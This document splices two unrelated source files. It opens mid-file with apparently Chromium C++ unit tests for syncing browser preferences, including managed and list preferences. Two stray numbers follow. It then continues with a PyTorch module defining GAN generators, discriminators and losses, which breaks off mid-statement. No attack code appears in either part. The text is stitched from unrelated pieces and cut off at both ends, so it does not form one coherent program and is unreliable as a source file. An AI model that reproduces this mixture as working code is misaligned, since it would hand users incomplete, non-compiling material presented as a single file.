kListPrefName); base::ListValue* url_list = update.Get(); url_list->AppendString(kExampleUrl0); url_list->AppendString(kExampleUrl1); } syncer::SyncChangeList out; InitWithSyncDataTakeOutput(syncer::SyncDataList(), &out); std::unique_ptr<base::Value> value(FindValue(kStringPrefName, out)); ASSERT_TRUE(value.get()); EXPECT_TRUE(GetPreferenceValue(kStringPrefName).Equals(value.get())); value = FindValue(kListPrefName, out); ASSERT_TRUE(value.get()); EXPECT_TRUE(GetPreferenceValue(kListPrefName).Equals(value.get())); } TEST_F(PrefServiceSyncableTest, ModelAssociationCloudHasData) { prefs_.SetString(kStringPrefName, kExampleUrl0); { ListPrefUpdate update(GetPrefs(), kListPrefName); base::ListValue* url_list = update.Get(); url_list->AppendString(kExampleUrl0); url_list->AppendString(kExampleUrl1); } syncer::SyncDataList in; syncer::SyncChangeList out; AddToRemoteDataList(kStringPrefName, base::StringValue(kExampleUrl1), &in); base::ListValue urls_to_restore; urls_to_restore.AppendString(kExampleUrl1); urls_to_restore.AppendString(kExampleUrl2); AddToRemoteDataList(kListPrefName, urls_to_restore, &in); AddToRemoteDataList(kDefaultCharsetPrefName, base::StringValue(kNonDefaultCharsetValue), &in); InitWithSyncDataTakeOutput(in, &out); ASSERT_FALSE(FindValue(kStringPrefName, out).get()); ASSERT_FALSE(FindValue(kDefaultCharsetPrefName, out).get()); EXPECT_EQ(kExampleUrl1, prefs_.GetString(kStringPrefName)); std::unique_ptr<base::ListValue> expected_urls(new base::ListValue); expected_urls->AppendString(kExampleUrl1); expected_urls->AppendString(kExampleUrl2); expected_urls->AppendString(kExampleUrl0); std::unique_ptr<base::Value> value(FindValue(kListPrefName, out)); ASSERT_TRUE(value.get()); EXPECT_TRUE(value->Equals(expected_urls.get())); EXPECT_TRUE(GetPreferenceValue(kListPrefName).Equals(expected_urls.get())); EXPECT_EQ(kNonDefaultCharsetValue, prefs_.GetString(kDefaultCharsetPrefName)); } TEST_F(PrefServiceSyncableTest, FailModelAssociation) { syncer::SyncChangeList output; TestSyncProcessorStub* stub = new TestSyncProcessorStub(&output); stub->FailNextProcessSyncChanges(); syncer::SyncMergeResult r = pref_sync_service_->MergeDataAndStartSyncing( syncer::PREFERENCES, syncer::SyncDataList(), base::WrapUnique(stub), base::MakeUnique<syncer::SyncErrorFactoryMock>()); EXPECT_TRUE(r.error().IsSet()); } TEST_F(PrefServiceSyncableTest, UpdatedPreferenceWithDefaultValue) { const PrefService::Preference* pref = prefs_.FindPreference(kStringPrefName); EXPECT_TRUE(pref->IsDefaultValue()); syncer::SyncChangeList out; InitWithSyncDataTakeOutput(syncer::SyncDataList(), &out); out.clear(); base::StringValue expected(kExampleUrl0); GetPrefs()->Set(kStringPrefName, expected); std::unique_ptr<base::Value> actual(FindValue(kStringPrefName, out)); ASSERT_TRUE(actual.get()); EXPECT_TRUE(expected.Equals(actual.get())); } TEST_F(PrefServiceSyncableTest, UpdatedPreferenceWithValue) { GetPrefs()->SetString(kStringPrefName, kExampleUrl0); syncer::SyncChangeList out; InitWithSyncDataTakeOutput(syncer::SyncDataList(), &out); out.clear(); base::StringValue expected(kExampleUrl1); GetPrefs()->Set(kStringPrefName, expected); std::unique_ptr<base::Value> actual(FindValue(kStringPrefName, out)); ASSERT_TRUE(actual.get()); EXPECT_TRUE(expected.Equals(actual.get())); } TEST_F(PrefServiceSyncableTest, UpdatedSyncNodeActionUpdate) { GetPrefs()->SetString(kStringPrefName, kExampleUrl0); InitWithNoSyncData(); base::StringValue expected(kExampleUrl1); syncer::SyncChangeList list; list.push_back(MakeRemoteChange(1, kStringPrefName, expected, SyncChange::ACTION_UPDATE)); pref_sync_service_->ProcessSyncChanges(FROM_HERE, list); const base::Value& actual = GetPreferenceValue(kStringPrefName); EXPECT_TRUE(expected.Equals(&actual)); } TEST_F(PrefServiceSyncableTest, UpdatedSyncNodeActionAdd) { InitWithNoSyncData(); base::StringValue expected(kExampleUrl0); syncer::SyncChangeList list; list.push_back( MakeRemoteChange(1, kStringPrefName, expected, SyncChange::ACTION_ADD)); pref_sync_service_->ProcessSyncChanges(FROM_HERE, list); const base::Value& actual = GetPreferenceValue(kStringPrefName); EXPECT_TRUE(expected.Equals(&actual)); EXPECT_EQ( 1U, pref_sync_service_->registered_preferences().count(kStringPrefName)); } TEST_F(PrefServiceSyncableTest, UpdatedSyncNodeUnknownPreference) { InitWithNoSyncData(); syncer::SyncChangeList list; base::StringValue expected(kExampleUrl0); list.push_back(MakeRemoteChange(1, "unknown preference", expected, SyncChange::ACTION_UPDATE)); pref_sync_service_->ProcessSyncChanges(FROM_HERE, list); // Nothing interesting happens on the client when it gets an update // of an unknown preference. We just should not crash. } TEST_F(PrefServiceSyncableTest, ManagedPreferences) { // Make the homepage preference managed. base::StringValue managed_value("http://example.com"); prefs_.SetManagedPref(kStringPrefName, managed_value.DeepCopy()); syncer::SyncChangeList out; InitWithSyncDataTakeOutput(syncer::SyncDataList(), &out); out.clear(); // Changing the homepage preference should not sync anything. base::StringValue user_value("http://chromium..com"); prefs_.SetUserPref(kStringPrefName, user_value.DeepCopy()); EXPECT_TRUE(out.empty()); // An incoming sync transaction should change the user value, not the managed // value. base::StringValue sync_value("http://crbug.com"); syncer::SyncChangeList list; list.push_back(MakeRemoteChange(1, kStringPrefName, sync_value, SyncChange::ACTION_UPDATE)); pref_sync_service_->ProcessSyncChanges(FROM_HERE, list); EXPECT_TRUE(managed_value.Equals(prefs_.GetManagedPref(kStringPrefName))); EXPECT_TRUE(sync_value.Equals(prefs_.GetUserPref(kStringPrefName))); } // List preferences have special handling at association time due to our ability // to merge the local and sync value. Make sure the merge logic doesn't merge // managed preferences. TEST_F(PrefServiceSyncableTest, ManagedListPreferences) { // Make the list of urls to restore on startup managed. base::ListValue managed_value; managed_value.AppendString(kExampleUrl0); managed_value.AppendString(kExampleUrl1); prefs_.SetManagedPref(kListPrefName, managed_value.DeepCopy()); // Set a cloud version. syncer::SyncDataList in; syncer::SyncChangeList out; base::ListValue urls_to_restore; urls_to_restore.AppendString(kExampleUrl1); urls_to_restore.AppendString(kExampleUrl2); AddToRemoteDataList(kListPrefName, urls_to_restore, &in); // Start sync and verify the synced value didn't get merged. InitWithSyncDataTakeOutput(in, &out); EXPECT_FALSE(FindValue(kListPrefName, out).get()); out.clear(); // Changing the user's urls to restore on startup pref should not sync // anything. base::ListValue user_value; user_value.AppendString("http://chromium.org"); prefs_.SetUserPref(kListPrefName, user_value.DeepCopy()); EXPECT_FALSE(FindValue(kListPrefName, out).get()); // An incoming sync transaction should change the user value, not the managed // value. base::ListValue sync_value; sync_value.AppendString("http://crbug.com"); syncer::SyncChangeList list; list.push_back(MakeRemoteChange(1, kListPrefName, sync_value, SyncChange::ACTION_UPDATE)); pref_sync_service_->ProcessSyncChanges(FROM_HERE, list); EXPECT_TRUE(managed_value.Equals(prefs_.GetManagedPref(kListPrefName))); EXPECT_TRUE(sync_value.Equals(prefs_.GetUserPref(kListPrefName))); } TEST_F(PrefServiceSyncableTest, DynamicManagedPreferences) { syncer::SyncChangeList out; InitWithSyncDataTakeOutput(syncer::SyncDataList(), &out); out.clear(); base::StringValue initial_value("http://example.com/initial"); GetPrefs()->Set(kStringPrefName, initial_value); std::unique_ptr<base::Value> actual(FindValue(kStringPrefName, out)); ASSERT_TRUE(actual.get()); EXPECT_TRUE(initial_value.Equals(actual.get())); // Switch kHomePage to managed and set a different value. base::StringValue managed_value("http://example.com/managed"); GetTestingPrefService()->SetManagedPref(kStringPrefName, managed_value.DeepCopy()); // The pref value should be the one dictated by policy. EXPECT_TRUE(managed_value.Equals(&GetPreferenceValue(kStringPrefName))); // Switch kHomePage back to unmanaged. GetTestingPrefService()->RemoveManagedPref(kStringPrefName); // The original value should be picked up. EXPECT_TRUE(initial_value.Equals(&GetPreferenceValue(kStringPrefName))); } TEST_F(PrefServiceSyncableTest, DynamicManagedPreferencesWithSyncChange) { syncer::SyncChangeList out; InitWithSyncDataTakeOutput(syncer::SyncDataList(), &out); out.clear(); base::StringValue initial_value("http://example.com/initial"); GetPrefs()->Set(kStringPrefName, initial_value); std::unique_ptr<base::Value> actual(FindValue(kStringPrefName, out)); EXPECT_TRUE(initial_value.Equals(actual.get())); // Switch kHomePage to managed and set a different value. base::StringValue managed_value("http://example.com/managed"); GetTestingPrefService()->SetManagedPref(kStringPrefName, managed_value.DeepCopy()); // Change the sync value. base::StringValue sync_value("http://example.com/sync"); syncer::SyncChangeList list; list.push_back(MakeRemoteChange(1, kStringPrefName, sync_value, SyncChange::ACTION_UPDATE)); pref_sync_service_->ProcessSyncChanges(FROM_HERE, list); // The pref value should still be the one dictated by policy. EXPECT_TRUE(managed_value.Equals(&GetPreferenceValue(kStringPrefName))); // Switch kHomePage back to unmanaged. GetTestingPrefService()->RemoveManagedPref(kStringPrefName); // Sync value should be picked up. EXPECT_TRUE(sync_value.Equals(&GetPreferenceValue(kStringPrefName))); } TEST_F(PrefServiceSyncableTest, DynamicManagedDefaultPreferences) { const PrefService::Preference* pref = prefs_.FindPreference(kStringPrefName); EXPECT_TRUE(pref->IsDefaultValue()); syncer::SyncChangeList out; InitWithSyncDataTakeOutput(syncer::SyncDataList(), &out); EXPECT_TRUE(IsSynced(kStringPrefName)); EXPECT_TRUE(pref->IsDefaultValue()); EXPECT_FALSE(FindValue(kStringPrefName, out).get()); out.clear(); // Switch kHomePage to managed and set a different value. base::StringValue managed_value("http://example.com/managed"); GetTestingPrefService()->SetManagedPref(kStringPrefName, managed_value.DeepCopy()); // The pref value should be the one dictated by policy. EXPECT_TRUE(managed_value.Equals(&GetPreferenceValue(kStringPrefName))); EXPECT_FALSE(pref->IsDefaultValue()); // There should be no synced value. EXPECT_FALSE(FindValue(kStringPrefName, out).get()); // Switch kHomePage back to unmanaged. GetTestingPrefService()->RemoveManagedPref(kStringPrefName); // The original value should be picked up. EXPECT_TRUE(pref->IsDefaultValue()); // There should still be no synced value. EXPECT_FALSE(FindValue(kStringPrefName, out).get()); } TEST_F(PrefServiceSyncableTest, DeletePreference) { prefs_.SetString(kStringPrefName, kExampleUrl0); const PrefService::Preference* pref = prefs_.FindPreference(kStringPrefName); EXPECT_FALSE(pref->IsDefaultValue()); InitWithNoSyncData(); std::unique_ptr<base::Value> null_value = base::Value::CreateNullValue(); syncer::SyncChangeList list; list.push_back(MakeRemoteChange(1, kStringPrefName, *null_value, SyncChange::ACTION_DELETE)); pref_sync_service_->ProcessSyncChanges(FROM_HERE, list); EXPECT_TRUE(pref->IsDefaultValue()); } TEST_F(PrefServiceSyncableTest, RegisterMergeDataFinishedCallback) { int num_callbacks = 0; prefs_.RegisterMergeDataFinishedCallback( base::Bind(&Increment, &num_callbacks)); EXPECT_EQ(0, num_callbacks); InitWithNoSyncData(); EXPECT_EQ(1, num_callbacks); } } // namespace } // namespace sync_preferences
7,819
1,077
import torch import os import math import torch.nn as nn from torch.nn import init import functools from torch.autograd import Variable import torch.nn.functional as F import numpy as np # from torch.utils.serialization import load_lua from lib.nn import SynchronizedBatchNorm2d as SynBN2d ############################################################################### # Functions ############################################################################### def pad_tensor(input): height_org, width_org = input.shape[2], input.shape[3] divide = 16 if width_org % divide != 0 or height_org % divide != 0: width_res = width_org % divide height_res = height_org % divide if width_res != 0: width_div = divide - width_res pad_left = int(width_div / 2) pad_right = int(width_div - pad_left) else: pad_left = 0 pad_right = 0 if height_res != 0: height_div = divide - height_res pad_top = int(height_div / 2) pad_bottom = int(height_div - pad_top) else: pad_top = 0 pad_bottom = 0 padding = nn.ReflectionPad2d((pad_left, pad_right, pad_top, pad_bottom)) input = padding(input) else: pad_left = 0 pad_right = 0 pad_top = 0 pad_bottom = 0 height, width = input.data.shape[2], input.data.shape[3] assert width % divide == 0, 'width cant divided by stride' assert height % divide == 0, 'height cant divided by stride' return input, pad_left, pad_right, pad_top, pad_bottom def pad_tensor_back(input, pad_left, pad_right, pad_top, pad_bottom): height, width = input.shape[2], input.shape[3] return input[:,:, pad_top: height - pad_bottom, pad_left: width - pad_right] def weights_init(m): classname = m.__class__.__name__ if classname.find('Conv') != -1: m.weight.data.normal_(0.0, 0.02) elif classname.find('BatchNorm2d') != -1: m.weight.data.normal_(1.0, 0.02) m.bias.data.fill_(0) def get_norm_layer(norm_type='instance'): if norm_type == 'batch': norm_layer = functools.partial(nn.BatchNorm2d, affine=True) elif norm_type == 'instance': norm_layer = functools.partial(nn.InstanceNorm2d, affine=False) elif norm_type == 'synBN': norm_layer = functools.partial(SynBN2d, affine=True) else: raise NotImplementedError('normalization layer [%s] is not found' % norm) return norm_layer def define_G(input_nc, output_nc, ngf, which_model_netG, norm='batch', use_dropout=False, gpu_ids=[], skip=False, opt=None): netG = None use_gpu = len(gpu_ids) > 0 norm_layer = get_norm_layer(norm_type=norm) # if use_gpu: # assert(torch.cuda.is_available()) if which_model_netG == 'resnet_9blocks': netG = ResnetGenerator(input_nc, output_nc, ngf, norm_layer=norm_layer, use_dropout=use_dropout, n_blocks=9, gpu_ids=gpu_ids) elif which_model_netG == 'resnet_6blocks': netG = ResnetGenerator(input_nc, output_nc, ngf, norm_layer=norm_layer, use_dropout=use_dropout, n_blocks=6, gpu_ids=gpu_ids) elif which_model_netG == 'unet_128': netG = UnetGenerator(input_nc, output_nc, 7, ngf, norm_layer=norm_layer, use_dropout=use_dropout, gpu_ids=gpu_ids) elif which_model_netG == 'unet_256': netG = UnetGenerator(input_nc, output_nc, 8, ngf, norm_layer=norm_layer, use_dropout=use_dropout, gpu_ids=gpu_ids, skip=skip, opt=opt) elif which_model_netG == 'unet_512': netG = UnetGenerator(input_nc, output_nc, 9, ngf, norm_layer=norm_layer, use_dropout=use_dropout, gpu_ids=gpu_ids, skip=skip, opt=opt) elif which_model_netG == 'sid_unet': netG = Unet(opt, skip) elif which_model_netG == 'sid_unet_shuffle': netG = Unet_pixelshuffle(opt, skip) elif which_model_netG == 'sid_unet_resize': netG = Unet_resize_conv(opt, skip) elif which_model_netG == 'DnCNN': netG = DnCNN(opt, depth=17, n_channels=64, image_channels=1, use_bnorm=True, kernel_size=3) else: raise NotImplementedError('Generator model name [%s] is not recognized' % which_model_netG) if torch.cuda.is_available() and not opt.cFlag: netG.cuda(device=gpu_ids[0]) # netG = torch.nn.DataParallel(netG, gpu_ids) netG.apply(weights_init) return netG def define_D(input_nc, ndf, which_model_netD, n_layers_D=3, norm='batch', use_sigmoid=False, gpu_ids=[], patch=False): netD = None use_gpu = len(gpu_ids) > 0 norm_layer = get_norm_layer(norm_type=norm) if use_gpu: assert(torch.cuda.is_available()) if which_model_netD == 'basic': netD = NLayerDiscriminator(input_nc, ndf, n_layers=3, norm_layer=norm_layer, use_sigmoid=use_sigmoid, gpu_ids=gpu_ids) elif which_model_netD == 'n_layers': netD = NLayerDiscriminator(input_nc, ndf, n_layers_D, norm_layer=norm_layer, use_sigmoid=use_sigmoid, gpu_ids=gpu_ids) elif which_model_netD == 'no_norm': netD = NoNormDiscriminator(input_nc, ndf, n_layers_D, use_sigmoid=use_sigmoid, gpu_ids=gpu_ids) elif which_model_netD == 'no_norm_4': netD = NoNormDiscriminator(input_nc, ndf, n_layers_D, use_sigmoid=use_sigmoid, gpu_ids=gpu_ids) elif which_model_netD == 'no_patchgan': netD = FCDiscriminator(input_nc, ndf, n_layers_D, use_sigmoid=use_sigmoid, gpu_ids=gpu_ids, patch=patch) else: raise NotImplementedError('Discriminator model name [%s] is not recognized' % which_model_netD) if use_gpu: netD.cuda(device=gpu_ids[0]) netD = torch.nn.DataParallel(netD, gpu_ids) netD.apply(weights_init) return netD def print_network(net): num_params = 0 for param in net.parameters(): num_params += param.numel() print(net) print('Total number of parameters: %d' % num_params) ############################################################################## # Classes ############################################################################## # Defines the GAN loss which uses either LSGAN or the regular GAN. # When LSGAN is used, it is basically same as MSELoss, # but it abstracts away the need to create the target label tensor # that has the same size as the input class GANLoss(nn.Module): def __init__(self, use_lsgan=True, target_real_label=1.0, target_fake_label=0.0, tensor=torch.FloatTensor): super(GANLoss, self).__init__() self.real_label = target_real_label self.fake_label = target_fake_label self.real_label_var = None self.fake_label_var = None self.Tensor = tensor if use_lsgan: self.loss = nn.MSELoss() else: self.loss = nn.BCELoss() def get_target_tensor(self, input, target_is_real): target_tensor = None if target_is_real: create_label = ((self.real_label_var is None) or (self.real_label_var.numel() != input.numel())) if create_label: real_tensor = self.Tensor(input.size()).fill_(self.real_label) self.real_label_var = Variable(real_tensor, requires_grad=False) target_tensor = self.real_label_var else: create_label = ((self.fake_label_var is None) or (self.fake_label_var.numel() != input.numel())) if create_label: fake_tensor = self.Tensor(input.size()).fill_(self.fake_label) self.fake_label_var = Variable(fake_tensor, requires_grad=False) target_tensor = self.fake_label_var return target_tensor def __call__(self, input, target_is_real): target_tensor = self.get_target_tensor(input, target_is_real) return self.loss(input, target_tensor) class DiscLossWGANGP(): def __init__(self): self.LAMBDA = 10 def name(self): return 'DiscLossWGAN-GP' def initialize(self, opt, tensor): # DiscLossLS.initialize(self, opt, tensor) self.LAMBDA = 10 # def get_g_loss(self, net, realA, fakeB): # # First, G(A) should fake the discriminator # self.D_fake = net.forward(fakeB) # return -self.D_fake.mean() def calc_gradient_penalty(self, netD, real_data, fake_data): alpha = torch.rand(1, 1) alpha = alpha.expand(real_data.size()) alpha = alpha.cuda() interpolates = alpha * real_data + ((1 - alpha) * fake_data) interpolates = interpolates.cuda() interpolates = Variable(interpolates, requires_grad=True) disc_interpolates = netD.forward(interpolates) gradients = torch.autograd.grad(outputs=disc_interpolates, inputs=interpolates, grad_outputs=torch.ones(disc_interpolates.size()).cuda(), create_graph=True, retain_graph=True, only_inputs=True)[0] gradient_penalty = ((gradients.norm(2, dim=1) - 1) ** 2).mean() * self.LAMBDA return gradient_penalty # Defines the generator that consists of Resnet blocks between a few # downsampling/upsampling operations. # Code and idea originally from <NAME>'s architecture. # https://github.com/jcjohnson/fast-neural-style/ class ResnetGenerator(nn.Module): def __init__(self, input_nc, output_nc, ngf=64, norm_layer=nn.BatchNorm2d, use_dropout=False, n_blocks=6, gpu_ids=[], padding_type='reflect'): assert(n_blocks >= 0) super(ResnetGenerator, self).__init__() self.input_nc = input_nc self.output_nc = output_nc self.ngf = ngf self.gpu_ids = gpu_ids model = [nn.ReflectionPad2d(3), nn.Conv2d(input_nc, ngf, kernel_size=7, padding=0), norm_layer(ngf), nn.ReLU(True)] n_downsampling = 2 for i in range(n_downsampling): mult = 2**i model += [nn.Conv2d(ngf * mult, ngf * mult * 2, kernel_size=3, stride=2, padding=1), norm_layer(ngf * mult * 2), nn.ReLU(True)] mult = 2**n_downsampling for i in range(n_blocks): model += [ResnetBlock(ngf * mult, padding_type=padding_type, norm_layer=norm_layer, use_dropout=use_dropout)] for i in range(n_downsampling): mult = 2**(n_downsampling - i) model += [nn.ConvTranspose2d(ngf * mult, int(ngf * mult / 2), kernel_size=3, stride=2, padding=1, output_padding=1), norm_layer(int(ngf * mult / 2)), nn.ReLU(True)] model += [nn.ReflectionPad2d(3)] model += [nn.Conv2d(ngf, output_nc, kernel_size=7, padding=0)] model += [nn.Tanh()] self.model = nn.Sequential(*model) def forward(self, input): if self.gpu_ids and isinstance(input.data, torch.cuda.FloatTensor): return nn.parallel.data_parallel(self.model, input, self.gpu_ids) else: return self.model(input) # Define a resnet block class ResnetBlock(nn.Module): def __init__(self, dim, padding_type, norm_layer, use_dropout): super(ResnetBlock, self).__init__() self.conv_block = self.build_conv_block(dim, padding_type, norm_layer, use_dropout) def build_conv_block(self, dim, padding_type, norm_layer, use_dropout): conv_block = [] p = 0 if padding_type == 'reflect': conv_block += [nn.ReflectionPad2d(1)] elif padding_type == 'replicate': conv_block += [nn.ReplicationPad2d(1)] elif padding_type == 'zero': p = 1 else: raise NotImplementedError('padding [%s] is not implemented' % padding_type) conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p), norm_layer(dim), nn.ReLU(True)] if use_dropout: conv_block += [nn.Dropout(0.5)] p = 0 if padding_type == 'reflect': conv_block += [nn.ReflectionPad2d(1)] elif padding_type == 'replicate': conv_block += [nn.ReplicationPad2d(1)] elif padding_type == 'zero': p = 1 else: raise NotImplementedError('padding [%s] is not implemented' % padding_type) conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p), norm_layer(dim)] return nn.Sequential(*conv_block) def forward(self, x): out = x + self.conv_block(x) return out # Defines the Unet generator. # |num_downs|: number of downsamplings in UNet. For example, # if |num_downs| == 7, image of size 128x128 will become of size 1x1 # at the bottleneck class UnetGenerator(nn.Module): def __init__(self, input_nc, output_nc, num_downs, ngf=64, norm_layer=nn.BatchNorm2d, use_dropout=False, gpu_ids=[], skip=False, opt=None): super(UnetGenerator, self).__init__() self.gpu_ids = gpu_ids self.opt = opt # currently support only input_nc == output_nc assert(input_nc == output_nc) # construct unet structure unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, norm_layer=norm_layer, innermost=True, opt=opt) for i in range(num_downs - 5): unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, unet_block, norm_layer=norm_layer, use_dropout=use_dropout, opt=opt) unet_block = UnetSkipConnectionBlock(ngf * 4, ngf * 8, unet_block, norm_layer=norm_layer, opt=opt) unet_block = UnetSkipConnectionBlock(ngf * 2, ngf * 4, unet_block, norm_layer=norm_layer, opt=opt) unet_block = UnetSkipConnectionBlock(ngf, ngf * 2, unet_block, norm_layer=norm_layer, opt=opt) unet_block = UnetSkipConnectionBlock(output_nc, ngf, unet_block, outermost=True, norm_layer=norm_layer, opt=opt) if skip == True: skipmodule = SkipModule(unet_block, opt) self.model = skipmodule else: self.model = unet_block def forward(self, input): if self.gpu_ids and isinstance(input.data, torch.cuda.FloatTensor): return nn.parallel.data_parallel(self.model, input, self.gpu_ids) else: return self.model(input) class SkipModule(nn.Module): def __init__(self, submodule, opt): super(SkipModule, self).__init__() self.submodule = submodule self.opt = opt def forward(self, x): latent = self.submodule(x) return self.opt.skip*x + latent, latent # Defines the submodule with skip connection. # X -------------------identity---------------------- X # |-- downsampling -- |submodule| -- upsampling --| class UnetSkipConnectionBlock(nn.Module): def __init__(self, outer_nc, inner_nc, submodule=None, outermost=False, innermost=False, norm_layer=nn.BatchNorm2d, use_dropout=False, opt=None): super(UnetSkipConnectionBlock, self).__init__() self.outermost = outermost downconv = nn.Conv2d(outer_nc, inner_nc, kernel_size=4, stride=2, padding=1) downrelu = nn.LeakyReLU(0.2, True) downnorm = norm_layer(inner_nc) uprelu = nn.ReLU(True) upnorm = norm_layer(outer_nc) if opt.use_norm == 0: if outermost: upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc, kernel_size=4, stride=2, padding=1) down = [downconv] up = [uprelu, upconv, nn.Tanh()] model = down + [submodule] + up elif innermost: upconv = nn.ConvTranspose2d(inner_nc, outer_nc, kernel_size=4, stride=2, padding=1) down = [downrelu, downconv] up = [uprelu, upconv] model = down + up else: upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc, kernel_size=4, stride=2, padding=1) down = [downrelu, downconv] up = [uprelu, upconv] if use_dropout: model = down + [submodule] + up + [nn.Dropout(0.5)] else: model = down + [submodule] + up else: if outermost: upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc, kernel_size=4, stride=2, padding=1) down = [downconv] up = [uprelu, upconv, nn.Tanh()] model = down + [submodule] + up elif innermost: upconv = nn.ConvTranspose2d(inner_nc, outer_nc, kernel_size=4, stride=2, padding=1) down = [downrelu, downconv] up = [uprelu, upconv, upnorm] model = down + up else: upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc, kernel_size=4, stride=2, padding=1) down = [downrelu, downconv, downnorm] up = [uprelu, upconv, upnorm] if use_dropout: model = down + [submodule] + up + [nn.Dropout(0.5)] else: model = down + [submodule] + up self.model = nn.Sequential(*model) def forward(self, x): if self.outermost: return self.model(x) else: return torch.cat([self.model(x), x], 1) # Defines the PatchGAN discriminator with the specified arguments. class NLayerDiscriminator(nn.Module): def __init__(self, input_nc, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d, use_sigmoid=False, gpu_ids=[]): super(NLayerDiscriminator, self).__init__() self.gpu_ids = gpu_ids kw = 4 padw = int(np.ceil((kw-1)/2)) sequence = [ nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw), nn.LeakyReLU(0.2, True) ] nf_mult = 1 nf_mult_prev = 1 for n in range(1, n_layers): nf_mult_prev = nf_mult nf_mult = min(2**n, 8) sequence += [ nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=2, padding=padw), norm_layer(ndf * nf_mult), nn.LeakyReLU(0.2, True) ] nf_mult_prev = nf_mult nf_mult = min(2**n_layers, 8) sequence += [ nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=1, padding=padw), norm_layer(ndf * nf_mult), nn.LeakyReLU(0.2, True) ] sequence += [nn.Conv2d(ndf * nf_mult, 1, kernel_size=kw, stride=1, padding=padw)] if use_sigmoid: sequence += [nn.Sigmoid()] self.model = nn.Sequential(*sequence) def forward(self, input): # if len(self.gpu_ids) and isinstance(input.data, torch.cuda.FloatTensor): # return nn.parallel.data_parallel(self.model, input, self.gpu_ids) # else: return self.model(input) class NoNormDiscriminator(nn.Module): def __init__(self, input_nc, ndf=64, n_layers=3, use_sigmoid=False, gpu_ids=[]): super(NoNormDiscriminator, self).__init__() self.gpu_ids = gpu_ids kw = 4 padw = int(np.ceil((kw-1)/2)) sequence = [ nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw), nn.LeakyReLU(0.2, True) ] nf_mult = 1 nf_mult_prev = 1 for n in range(1, n_layers): nf_mult_prev = nf_mult nf_mult = min(2**n, 8) sequence += [ nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=2, padding=padw), nn.LeakyReLU(0.2, True) ] nf_mult_prev = nf_mult nf_mult = min(2**n_layers, 8) sequence += [ nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=1, padding=padw), nn.LeakyReLU(0.2, True) ] sequence += [nn.Conv2d(ndf * nf_mult, 1, kernel_size=kw, stride=1, padding=padw)] if use_sigmoid: sequence += [nn.Sigmoid()] self.model = nn.Sequential(*sequence) def forward(self, input): # if len(self.gpu_ids) and isinstance(input.data, torch.cuda.FloatTensor): # return nn.parallel.data_parallel(self.model, input, self.gpu_ids) # else: return self.model(input) class FCDiscriminator(nn.Module): def __init__(self, input_nc, ndf=64, n_layers=3, use_sigmoid=False, gpu_ids=[], patch=False): super(FCDiscriminator, self).__init__() self.gpu_ids = gpu_ids self.use_sigmoid = use_sigmoid kw = 4 padw = int(np.ceil((kw-1)/2)) sequence = [ nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw), nn.LeakyReLU(0.2, True) ] nf_mult = 1 nf_mult_prev = 1 for n in range(1, n_layers): nf_mult_prev = nf_mult nf_mult = min(2**n, 8) sequence += [ nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=2, padding=padw), nn.LeakyReLU(0.2, True) ] nf_mult_prev = nf_mult nf_mult = min(2**n_layers, 8) sequence += [ nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=1, padding=padw), nn.LeakyReLU(0.2, True) ] sequence += [nn.Conv2d(ndf * nf_mult, 1, kernel_size=kw, stride=1, padding=padw)] if patch: self.linear = nn.Linear(7*7,1) else: self.linear = nn.Linear(13*13,1) if use_sigmoid: self.sigmoid = nn.Sigmoid() self.model = nn.Sequential(*sequence) def forward(self, input): batchsize = input.size()[0] output = self.model(input) output = output.view(batchsize,-1) # print(output.size()) output = self.linear(output) if self.use_sigmoid: print("sigmoid") output = self.sigmoid(output) return output class Unet_resize_conv(nn.Module): def __init__(self, opt, skip): super(Unet_resize_conv, self).__init__() self.opt = opt self.skip = skip p = 1 # self.conv1_1 = nn.Conv2d(4, 32, 3, padding=p) if opt.self_attention: self.conv1_1 = nn.Conv2d(4, 32, 3, padding=p) # self.conv1_1 = nn.Conv2d(3, 32, 3, padding=p) self.downsample_1 = nn.MaxPool2d(2) self.downsample_2 = nn.MaxPool2d(2) self.downsample_3 = nn.MaxPool2d(2) self.downsample_4 = nn.MaxPool2d(2) else: self.conv1_1 = nn.Conv2d(3, 32, 3, padding=p) self.LReLU1_1 = nn.LeakyReLU(0.2, inplace=True) if self.opt.use_norm == 1: self.bn1_1 = SynBN2d(32) if self.opt.syn_norm else nn.BatchNorm2d(32) self.conv1_2 = nn.Conv2d(32, 32, 3, padding=p) self.LReLU1_2 = nn.LeakyReLU(0.2, inplace=True) if self.opt.use_norm == 1: self.bn1_2 = SynBN2d(32) if self.opt.syn_norm else nn.BatchNorm2d(32) self.max_pool1 = nn.AvgPool2d(2) if self.opt.use_avgpool == 1 else nn.MaxPool2d(2) self.conv2_1 = nn.Conv2d(32, 64, 3, padding=p) self.LReLU2_1 = nn.LeakyReLU(0.2, inplace=True) if self.opt.use_norm == 1: self.bn2_1 = SynBN2d(64) if self.opt.syn_norm else nn.BatchNorm2d(64) self.conv2_2 = nn.Conv2d(64, 64, 3, padding=p) self.LReLU2_2 = nn.LeakyReLU(0.2, inplace=True) if self.opt.use_norm == 1: self.bn2_2 = SynBN2d(64) if self.opt.syn_norm else nn.BatchNorm2d(64) self.max_pool2 = nn.AvgPool2d(2) if self.opt.use_avgpool == 1 else nn.MaxPool2d(2) self.conv3_1 = nn.Conv2d(64, 128, 3, padding=p) self.LReLU3_1 = nn.LeakyReLU(0.2, inplace=True) if self.opt.use_norm == 1: self.bn3_1 = SynBN2d(128) if self.opt.syn_norm else nn.BatchNorm2d(128) self.conv3_2 = 